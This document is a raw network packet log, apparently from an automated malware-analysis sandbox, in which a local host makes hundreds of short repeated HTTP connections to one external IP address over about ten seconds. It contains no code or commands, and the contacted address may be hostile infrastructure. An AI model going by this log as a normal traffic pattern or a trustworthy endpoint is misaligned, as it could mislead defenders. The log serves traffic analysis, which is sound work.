Feb 7, 2023 19:59:59.488944054 CET	80	50339	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.493905067 CET	50339	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.609119892 CET	50339	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.609879017 CET	50340	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.669465065 CET	80	50339	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.669651985 CET	50339	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.670170069 CET	80	50340	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.670305014 CET	50340	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.670957088 CET	50340	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.731189013 CET	80	50340	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.733455896 CET	80	50340	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.733536959 CET	50340	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.923760891 CET	50340	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.924478054 CET	50341	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.984148026 CET	80	50340	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.984246969 CET	50340	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:59.985450029 CET	80	50341	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:59.985565901 CET	50341	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.154877901 CET	50341	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.215392113 CET	80	50341	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.219201088 CET	80	50341	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.219357967 CET	50341	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.360991955 CET	50341	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.361639023 CET	50342	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.421786070 CET	80	50341	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.421879053 CET	50341	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.423692942 CET	80	50342	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.423789024 CET	50342	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.462429047 CET	50342	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.523889065 CET	80	50342	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.525985956 CET	80	50342	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.526072025 CET	50342	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.673644066 CET	50342	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.674381971 CET	50343	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.736666918 CET	80	50342	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.736754894 CET	50342	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.737802982 CET	80	50343	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.737911940 CET	50343	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.779937983 CET	50343	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:00.842578888 CET	80	50343	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.844572067 CET	80	50343	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:00.844655991 CET	50343	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.576829910 CET	50343	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.610367060 CET	50344	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.641249895 CET	80	50343	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:01.641340971 CET	50343	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.669683933 CET	80	50344	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:01.669867039 CET	50344	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.675170898 CET	50344	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.737030029 CET	80	50344	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:01.741522074 CET	80	50344	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:01.741667986 CET	50344	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.860230923 CET	50344	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.860975981 CET	50345	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.919537067 CET	80	50344	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:01.919789076 CET	50344	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.921466112 CET	80	50345	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:01.921700954 CET	50345	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:01.959618092 CET	50345	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:02.020190001 CET	80	50345	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:02.022805929 CET	80	50345	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:02.022944927 CET	50345	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:02.240633965 CET	50345	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:02.241425037 CET	50346	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:02.301327944 CET	80	50345	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:02.301495075 CET	50345	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:02.303836107 CET	80	50346	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:02.304033995 CET	50346	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.180455923 CET	50346	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.242897987 CET	80	50346	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.246685982 CET	80	50346	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.246819973 CET	50346	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.621397018 CET	50346	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.622082949 CET	50347	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.684926987 CET	80	50346	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.684982061 CET	80	50347	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.685132980 CET	50346	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.685179949 CET	50347	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.721906900 CET	50347	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.785056114 CET	80	50347	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.788212061 CET	80	50347	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.788294077 CET	50347	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.891623974 CET	50347	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.892508984 CET	50348	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.952852011 CET	80	50348	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.953048944 CET	50348	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.954155922 CET	80	50347	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:03.954242945 CET	50347	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:03.954544067 CET	50348	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.014807940 CET	80	50348	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.017246008 CET	80	50348	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.017429113 CET	50348	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.125709057 CET	50348	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.126764059 CET	50349	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.186180115 CET	80	50348	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.186332941 CET	50348	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.188350916 CET	80	50349	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.188481092 CET	50349	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.188949108 CET	50349	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.250293016 CET	80	50349	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.254842997 CET	80	50349	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.254992962 CET	50349	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.360194921 CET	50349	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.360950947 CET	50350	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.421577930 CET	80	50349	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.421775103 CET	50349	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.422348976 CET	80	50350	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.422492981 CET	50350	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.422898054 CET	50350	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.485728025 CET	80	50350	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.488667965 CET	80	50350	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.488768101 CET	50350	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.594997883 CET	50350	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.595906973 CET	50351	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.656742096 CET	80	50350	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.656929016 CET	50350	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.657603979 CET	80	50351	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.657783985 CET	50351	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.658669949 CET	50351	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.720232964 CET	80	50351	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.722706079 CET	80	50351	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.722815037 CET	50351	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.828104019 CET	50351	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.829648018 CET	50352	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.890216112 CET	80	50352	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.890341043 CET	80	50351	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.890377045 CET	50352	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.890413046 CET	50351	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.891222000 CET	50352	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:04.951742887 CET	80	50352	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.954359055 CET	80	50352	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:04.954538107 CET	50352	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.062354088 CET	50352	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.063205957 CET	50353	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.123016119 CET	80	50352	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.123210907 CET	50352	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.125669956 CET	80	50353	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.125837088 CET	50353	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.126188040 CET	50353	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.188646078 CET	80	50353	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.192668915 CET	80	50353	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.192852020 CET	50353	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.298444033 CET	50353	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.299276114 CET	50354	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.360785007 CET	80	50354	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.360970020 CET	50354	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.361092091 CET	80	50353	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.361164093 CET	50353	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.364849091 CET	50354	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.426292896 CET	80	50354	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.428816080 CET	80	50354	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.428932905 CET	50354	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.547035933 CET	50354	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.547760010 CET	50355	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.609338045 CET	80	50355	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.609514952 CET	50355	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.609890938 CET	80	50354	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.609973907 CET	50354	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.610275030 CET	50355	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.671555042 CET	80	50355	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.673839092 CET	80	50355	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.674029112 CET	50355	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.781850100 CET	50355	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.782968044 CET	50356	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.842410088 CET	80	50355	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.842627048 CET	50355	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.845639944 CET	80	50356	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.845830917 CET	50356	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.846184015 CET	50356	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:05.908838034 CET	80	50356	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.911701918 CET	80	50356	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:05.911844969 CET	50356	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.017349005 CET	50356	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.018101931 CET	50357	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.080421925 CET	80	50356	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.080518961 CET	80	50357	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.080625057 CET	50356	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.080784082 CET	50357	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.081115961 CET	50357	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.141823053 CET	80	50357	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.145586014 CET	80	50357	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.145759106 CET	50357	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.253407001 CET	50357	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.254050970 CET	50358	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.313503027 CET	80	50358	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.313669920 CET	50358	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.314089060 CET	80	50357	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.314096928 CET	50358	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.314173937 CET	50357	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.373501062 CET	80	50358	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.375655890 CET	80	50358	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.375770092 CET	50358	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.485142946 CET	50358	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.485800982 CET	50359	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.544656992 CET	80	50358	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.544812918 CET	50358	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.547058105 CET	80	50359	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.547142029 CET	50359	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.547653913 CET	50359	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.608741045 CET	80	50359	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.611047983 CET	80	50359	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.611172915 CET	50359	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.720047951 CET	50359	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.720885992 CET	50360	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.781430960 CET	80	50359	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.781800032 CET	50359	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.783508062 CET	80	50360	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.783632040 CET	50360	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.784027100 CET	50360	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.846621037 CET	80	50360	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.849456072 CET	80	50360	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:06.849842072 CET	50360	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.969670057 CET	50360	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:06.970598936 CET	50361	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.031193972 CET	80	50361	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.031393051 CET	50361	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.031776905 CET	50361	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.032721996 CET	80	50360	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.035429955 CET	50360	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.092057943 CET	80	50361	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.095475912 CET	80	50361	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.095662117 CET	50361	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.203805923 CET	50361	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.204581976 CET	50362	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.264271021 CET	80	50361	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.264468908 CET	50361	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.265023947 CET	80	50362	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.265569925 CET	50362	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.266628981 CET	50362	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.327327967 CET	80	50362	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.329888105 CET	80	50362	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.335485935 CET	50362	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.455442905 CET	50362	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.467770100 CET	50363	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.516077042 CET	80	50362	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.518003941 CET	50362	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.528244019 CET	80	50363	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.530977011 CET	50363	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.542076111 CET	50363	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.602484941 CET	80	50363	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.604684114 CET	80	50363	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.604815006 CET	50363	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.719260931 CET	50363	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.720055103 CET	50364	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.780013084 CET	80	50363	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.780224085 CET	50363	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.780658007 CET	80	50364	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.780770063 CET	50364	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.781570911 CET	50364	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.842112064 CET	80	50364	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.844630003 CET	80	50364	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:07.844799042 CET	50364	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.953737020 CET	50364	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:07.954673052 CET	50365	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.015244007 CET	80	50364	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.015362024 CET	50364	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.015564919 CET	80	50365	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.015662909 CET	50365	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.016119003 CET	50365	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.076566935 CET	80	50365	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.080651999 CET	80	50365	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.080791950 CET	50365	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.187774897 CET	50365	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.188636065 CET	50366	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.248430014 CET	80	50365	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.248517036 CET	50365	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.250854969 CET	80	50366	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.250963926 CET	50366	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.251400948 CET	50366	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.313610077 CET	80	50366	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.315598965 CET	80	50366	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.315721989 CET	50366	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.422168016 CET	50366	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.423038006 CET	50367	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.483309984 CET	80	50367	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.483549118 CET	50367	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.484447002 CET	80	50366	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.484564066 CET	50367	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.484641075 CET	50366	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.544903040 CET	80	50367	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.548141003 CET	80	50367	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.548281908 CET	50367	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.657486916 CET	50367	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.658406019 CET	50368	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.717907906 CET	80	50367	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.718060970 CET	50367	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.720953941 CET	80	50368	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.721090078 CET	50368	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.721533060 CET	50368	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.783890963 CET	80	50368	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.786614895 CET	80	50368	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.786735058 CET	50368	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.891001940 CET	50368	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.891782999 CET	50369	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.953564882 CET	80	50368	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.953751087 CET	50368	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.953949928 CET	80	50369	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:08.954075098 CET	50369	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:08.954483986 CET	50369	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.016685009 CET	80	50369	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.019556046 CET	80	50369	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.019675016 CET	50369	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.125261068 CET	50369	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.126104116 CET	50370	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.187611103 CET	80	50369	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.187753916 CET	50369	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.188500881 CET	80	50370	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.188636065 CET	50370	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.189136982 CET	50370	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.251498938 CET	80	50370	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.255594969 CET	80	50370	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.255708933 CET	50370	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.360560894 CET	50370	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.362368107 CET	50371	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.421854019 CET	80	50371	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.422020912 CET	50371	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.423015118 CET	80	50370	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.423113108 CET	50370	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.426162004 CET	50371	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.485656977 CET	80	50371	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.488029957 CET	80	50371	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.488141060 CET	50371	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.633223057 CET	50371	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.639818907 CET	50372	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.697408915 CET	80	50371	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.697523117 CET	50371	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.704360008 CET	80	50372	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.704471111 CET	50372	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.704797029 CET	50372	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.769227028 CET	80	50372	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.771244049 CET	80	50372	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.771346092 CET	50372	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.879596949 CET	50372	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.880215883 CET	50373	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.940696955 CET	80	50372	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.940804005 CET	50372	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.942030907 CET	80	50373	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:09.942161083 CET	50373	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:09.942648888 CET	50373	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.003741026 CET	80	50373	62.204.41.4	192.168.2.5
